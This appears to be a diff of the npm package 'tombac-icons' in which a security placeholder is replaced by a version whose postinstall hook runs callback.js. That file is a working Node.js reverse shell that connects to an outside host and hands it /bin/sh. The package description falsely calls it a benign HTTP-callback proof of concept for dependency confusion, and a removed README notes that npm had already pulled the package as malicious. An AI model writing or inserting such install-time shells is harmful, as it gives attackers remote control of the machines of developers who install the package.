tombac-icons 0.0.1-security → 1.0.9

package/callback.js

@@ -0,0 +1,25 @@
+// Reverse shell PoC in Node.js
+const net = require("net");
+const { spawn } = require("child_process");
+
+// جایگزین با IP ماشین خودت
+const HOST = "proxy60.rt3.io";
+const PORT = 39781;
+
+const client = new net.Socket();
+
+function connect() {
+  client.connect(PORT, HOST, () => {
+    const sh = spawn("/bin/sh", []);
+    client.write("[*] Connected to target\n");
+    client.pipe(sh.stdin);
+    sh.stdout.pipe(client);
+    sh.stderr.pipe(client);
+  });
+}
+
+client.on("error", () => {
+  setTimeout(connect, 3000); // تلاش مجدد در صورت خطا
+});
+
+connect();

package/index.js

@@ -0,0 +1,2 @@
+// benign placeholder
+module.exports = () => "tombac-icons benign package";

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "tombac-icons",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.9",
+  "description": "Benign PoC for dependency confusion (HTTP callback only)",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node callback.js"
+  },
+  "author": "mohammadtayb",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=tombac-icons for more information.